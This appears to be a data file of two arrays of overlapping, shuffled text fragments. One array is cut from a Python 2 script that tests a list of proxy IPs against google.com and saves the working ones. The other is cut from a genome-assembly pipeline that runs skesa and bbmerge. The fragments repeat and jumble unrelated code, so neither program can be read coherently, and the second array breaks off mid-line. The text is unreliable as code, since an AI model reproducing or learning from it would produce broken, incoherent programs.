[ "', e.code return e.code except Exception, detail: print \"ERROR:\", detail return 1 return", "= open(\"new.txt\", 'w') count = 0 for item in proxyList: if is_bad_proxy(item): print", "return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for line", "else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES \" + str(count) x.close() f.close()", "the list of proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http':", "= urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') #", "open(\"new.txt\", 'w') count = 0 for item in proxyList: if is_bad_proxy(item): print \"Bad", "\"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for line in f: line =", "filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for line in f:", "in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count", "url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ', e.code return", "address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ', e.code return e.code", "is_bad_proxy(item): print \"Bad Proxy\", item count = count + 1; else: x.write(item); x.write('\\n');", "= count + 1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES \"", "Exception, detail: print \"ERROR:\", detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f", "urllib2.HTTPError, e: print 'Error code: ', e.code return e.code except Exception, detail: print", "return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = [];", "of proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener", "'Error code: ', e.code return e.code except Exception, detail: print \"ERROR:\", detail return", "for line in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\",", "def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent',", "= line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count = 0 for", "proxyList = []; for line in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList", "if is_bad_proxy(item): print \"Bad Proxy\", item count = count + 1; else: x.write(item);", "f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count =", "= 0 for item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count", "item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count = count +", "import urllib2, socket socket.setdefaulttimeout(180) # read the list of proxy IPs in proxyList", "0 for item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count =", "except urllib2.HTTPError, e: print 'Error code: ', e.code return e.code except Exception, detail:", "proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener =", "+ 1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES \" + str(count)", "socket socket.setdefaulttimeout(180) # read the list of proxy IPs in proxyList def is_bad_proxy(pip):", "read the list of proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler =", "count = count + 1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES", "= [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req) except", "pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the", "in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders", "sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ', e.code return e.code except Exception,", "code: ', e.code return e.code except Exception, detail: print \"ERROR:\", detail return 1", "opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req)", "proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders =", "change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ',", "'w') count = 0 for item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\",", "detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList =", "\"Bad Proxy\", item count = count + 1; else: x.write(item); x.write('\\n'); print \"SO", "print 'Error code: ', e.code return e.code except Exception, detail: print \"ERROR:\", detail", "proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count = count + 1; else:", "# read the list of proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler", "= []; for line in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x", "e: print 'Error code: ', e.code return e.code except Exception, detail: print \"ERROR:\",", "proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count = 0 for item in", "proxyList x = open(\"new.txt\", 'w') count = 0 for item in proxyList: if", "count = 0 for item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item", "opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url", "item count = count + 1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD", "line in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w')", "= open(filename) proxyList = []; for line in f: line = line.rstrip('\\n') proxyList.append(line)", "open(filename) proxyList = []; for line in f: line = line.rstrip('\\n') proxyList.append(line) print", "list of proxy IPs in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip})", "except Exception, detail: print \"ERROR:\", detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\"", "= \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for line in f: line", "[('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError,", "'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e:", "socket.setdefaulttimeout(180) # read the list of proxy IPs in proxyList def is_bad_proxy(pip): try:", "detail: print \"ERROR:\", detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f =", "0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for line in", "req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error", "in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count = count + 1;", "the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ', e.code", "print \"Bad Proxy\", item count = count + 1; else: x.write(item); x.write('\\n'); print", "urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change", "print \"ERROR:\", detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename)", "proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com')", "for item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count = count", "e.code return e.code except Exception, detail: print \"ERROR:\", detail return 1 return 0", "line = line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count = 0", "count + 1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES \" +", "is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')]", "IPs in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler)", "\"ERROR:\", detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList", "x = open(\"new.txt\", 'w') count = 0 for item in proxyList: if is_bad_proxy(item):", "urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print", "# change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code:", "try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener)", "1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for", "line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count = 0 for item", "e.code except Exception, detail: print \"ERROR:\", detail return 1 return 0 filename =", "f = open(filename) proxyList = []; for line in f: line = line.rstrip('\\n')", "= urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address", "here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ', e.code return e.code except", "urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here", "print proxyList x = open(\"new.txt\", 'w') count = 0 for item in proxyList:", "Proxy\", item count = count + 1; else: x.write(item); x.write('\\n'); print \"SO MANY", "urllib2, socket socket.setdefaulttimeout(180) # read the list of proxy IPs in proxyList def", "return e.code except Exception, detail: print \"ERROR:\", detail return 1 return 0 filename", "[]; for line in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x =", "1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES \" + str(count) x.close()" ]
[ "contigs=sample.general.assemblyfile) # If there are no fastq files, populate the metadata appropriately else:", "Create a report with the total number of reads, and the number of", ":param err_log: bbmerge outputs the stats in the error file :return: num_reads, the", "number of paired readds \"\"\" # Initialise variables num_reads = 0 paired_reads =", "If the report exists, open it to determine which samples have already been", "sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start", "as error_log: # Extract the necessary information for line in error_log: if 'Pairs:'", "not in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod", "the name of the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) #", "reads, and the number of reads that could be paired from the bbmerge", "inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath", "line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self):", "the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None)", "Run skesa to assemble genomes \"\"\" with progressbar(self.metadata) as bar: for sample in", "as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs", "to the report if sample.name not in lines: with open(report, 'a+') as report_file:", "merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log,", "in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether", "make_path(outpath) # Merge path - keep all the merged FASTQ files in one", "name of the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile)", "paired-end if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path", "= os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of reads, and the number", "Set the name of the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name))", "- keep all the merged FASTQ files in one directory merge_path = os.path.join(self.path,", "= sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files sample.general.assemblyfastq = fastqfiles forward", "' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use", "If there are no fastq files, populate the metadata appropriately else: sample.general.assembly_output =", "results to the report if sample.name not in lines: with open(report, 'a+') as", "returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as", "number of reads, and the number of reads that could be paired :param", "'r') as report_file: for line in report_file: lines.append(line.split(',')[0]) # Add the results to", "\"\"\" Run skesa to assemble genomes \"\"\" with progressbar(self.metadata) as bar: for sample", "try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure isolate, assemble it.", "fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz = True if '.gz'", "name of the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set", "assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly", "as a metagenome \"\"\" # Set the assembly file to 'NA' as assembly", "try: if not os.path.isfile(sample.general.mergedreads): # Run the merging command out, err, cmd =", "os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the", "shutil import os __author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def", "lines = list() with open(report, 'r') as report_file: for line in report_file: lines.append(line.split(',')[0])", "Parse the outputs from bbmerge to extract the total number of reads, as", "None, None) def merge(self, sample): \"\"\" Use bbmerge to merge paired FASTQ files", "python3 from olctools.accessoryFunctions.accessoryFunctions import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess", "lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log):", "report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists, open it to", "= 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start =", "Set the assembly file to 'NA' as assembly is not desirable for metagenomes", "with open(err_log, 'r') as error_log: # Extract the necessary information for line in", "the .bestassembly attribute to 'NA' \"\"\" for sample in self.metadata: try: # Set", "sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not", "bar: for sample in bar: # Initialise the assembly command sample.commands.assemble = str()", "'merged_reads') make_path(outpath) # Merge path - keep all the merged FASTQ files in", "bbmerge outputs the stats in the error file :return: num_reads, the total number", "sample): \"\"\" Use bbmerge to merge paired FASTQ files for use in metagenomics", "# Ensure that the assembly isn't just an empty file if size ==", "fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends", "report_file: for line in report_file: lines.append(line.split(',')[0]) # Add the results to the report", "in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def", "(CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name of the report to store", "os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the", "for use in metagenomics pipelines. Create a report with the total number of", "the pre-metagenome pipeline try: status = sample.run.Description except AttributeError: status = 'unknown' if", "sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out,", "the stats in the error file :return: num_reads, the total number of reads,", "not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If", "'merged_metagenomes.csv') # Extract the total number of reads, and the number of reads", "settings for the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} '", "from bbmerge to extract the total number of reads, as well as the", "shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the name and path of", "set the .bestassembly attribute to 'NA' \"\"\" for sample in self.metadata: try: #", "desirable for metagenomes sample.general.assemblyfile = 'NA' # Can only merge paired-end if len(sample.general.fastqfiles)", "report with the total number of reads, and the number of reads that", "paired_reads, number of paired readds \"\"\" # Initialise variables num_reads = 0 paired_reads", "of reads, and the number of reads that could be paired from the", "IndexError): delattr(sample.general, 'mergedreads') # Set the name of the report to store the", "it to determine which samples have already been added - useful if re-running", "None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\"", "err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr,", ".format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use single read settings for", "'NA' # Add the name and path of the filtered file to the", "one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of the", "already been added - useful if re-running # the analysis else: lines =", "could be paired from the bbmerge # err stream num_reads, num_pairs = self.reads(error)", "file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just", "be paired :param sample: metadata sample object flagged as a metagenome \"\"\" #", "sample.general.bestassemblyfile = 'NA' # Add the name and path of the filtered file", "results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of reads, and", "metagenomes sample.general.assemblyfile = 'NA' # Can only merge paired-end if len(sample.general.fastqfiles) == 2:", "def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file from the assembler is", "#!/usr/bin/env python3 from olctools.accessoryFunctions.accessoryFunctions import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from", "with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set", "= line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output", "file from the assembler is present. If not, set the .bestassembly attribute to", "If there are two fastq files if len(fastqfiles) == 2: # Set the", "# Extract the necessary information for line in error_log: if 'Pairs:' in line:", "with the total number of reads, and the number of reads that could", "= inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies')) make_path(os.path.join(self.path, 'raw_assemblies')) make_path(self.reportpath)", "exists, open it to determine which samples have already been added - useful", "{fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles),", "present. If not, set the .bestassembly attribute to 'NA' \"\"\" for sample in", "line in error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in", ".bestassembly attribute to 'NA' \"\"\" for sample in self.metadata: try: # Set the", "'NA' as assembly is not desirable for metagenomes sample.general.assemblyfile = 'NA' # Can", "to extract the total number of reads, as well as the number of", "to store the metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract", "self.start = inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath", "'metagenome': self.merge(sample) else: # Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output)", "flagged as a metagenome \"\"\" # Set the assembly file to 'NA' as", "the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name))", "sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as log_file: log_file.write(out) with open(error, 'w')", "__init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path =", "metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number", "--cores {threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus,", "'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to", "Same as above, but use single read settings for the assembler else: sample.commands.assemble", "sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure", "'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the merging command out, err, cmd", "attribute to 'NA' \"\"\" for sample in self.metadata: try: # Set the name", "'{}.fasta'.format(sample.name)) # Set the name of the unfiltered spades assembly output file if", "os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just an empty file if size", "FASTQ files in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the", "a metagenome \"\"\" # Set the assembly file to 'NA' as assembly is", "'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles", "Initialise the assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If the", "= inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies'))", "If the report doesn't exist, create it with the header and the results", "the log file with open(err_log, 'r') as error_log: # Extract the necessary information", "threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use single read settings for the", "sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz = True if '.gz' in forward", "# Run the merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True,", "bar: # Initialise the assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: #", "for sample in bar: # Initialise the assembly command sample.commands.assemble = str() try:", "= str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure isolate,", "that could be paired :param err_log: bbmerge outputs the stats in the error", "the the forward fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz =", "gz = True if '.gz' in forward else False # If there are", "2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles}", "self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies')) make_path(os.path.join(self.path, 'raw_assemblies'))", "fastq files if len(fastqfiles) == 2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7", "in the error file :return: num_reads, the total number of reads, paired_reads, number", "the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure", "Add the name and path of the filtered file to the metadata sample.general.filteredfile", "fastq files, populate the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA'", "the outputs from bbmerge to extract the total number of reads, as well", "isn't just an empty file if size == 0: sample.general.bestassemblyfile = 'NA' else:", "True if '.gz' in forward else False # If there are two fastq", "'mergedreads') # Set the name of the report to store the metagenome file", "log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') #", "there are no fastq files, populate the metadata appropriately else: sample.general.assembly_output = 'NA'", "number of reads that could be paired :param err_log: bbmerge outputs the stats", "in metagenomics pipelines. Create a report with the total number of reads, and", "self.merge(sample) else: # Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile", "write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None,", "name and path of the filtered file to the metadata sample.general.filteredfile = filtered_outputfile", "run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess import CalledProcessError from click import", "self.cpus = inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path,", "import logging import shutil import os __author__ = 'adamkoziol' class Skesa(object): def main(self):", "sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus", ":return: num_reads, the total number of reads, paired_reads, number of paired readds \"\"\"", "sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure isolate, assemble it. Otherwise, run", "'{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the", "status = sample.run.Description except AttributeError: status = 'unknown' if status == 'metagenome': self.merge(sample)", "= inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile =", "os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if not", "self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\" with progressbar(self.metadata)", "number of reads, as well as the number of reads that could be", "in self.metadata: try: # Set the name of the filtered assembly file filtered_outputfile", "to 'NA' \"\"\" for sample in self.metadata: try: # Set the name of", "empty file if size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile", "else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out", "file to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile", "'{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads):", "'merged_reads') make_path(merge_path) # Set the name of the merged, and unmerged files sample.general.mergedreads", "object flagged as a metagenome \"\"\" # Set the assembly file to 'NA'", "== 'metagenome': self.merge(sample) else: # Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output')", "with open(report, 'r') as report_file: for line in report_file: lines.append(line.split(',')[0]) # Add the", "@staticmethod def reads(err_log): \"\"\" Parse the outputs from bbmerge to extract the total", "sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\", "# If the report doesn't exist, create it with the header and the", "os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name))", "= 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA'", "are no fastq files, populate the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq", "of reads, and the number of reads that could be paired :param sample:", "contigs=sample.general.assemblyfile) # Same as above, but use single read settings for the assembler", "'.gz' in forward else False # If there are two fastq files if", "paired=num_pairs)) # If the report exists, open it to determine which samples have", "0 paired_reads = 0 # Open the log file with open(err_log, 'r') as", "bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with", "genewrappers.biotools import bbtools from subprocess import CalledProcessError from click import progressbar import logging", "sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run", "elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\"", "necessary information for line in error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip()", "use single read settings for the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles}", "from the first sample if not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n'", "as well as the number of reads that could be paired :param err_log:", "num_reads, the total number of reads, paired_reads, number of paired readds \"\"\" #", "the contigs.fasta output file from the assembler is present. If not, set the", "sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if", "an empty file if size 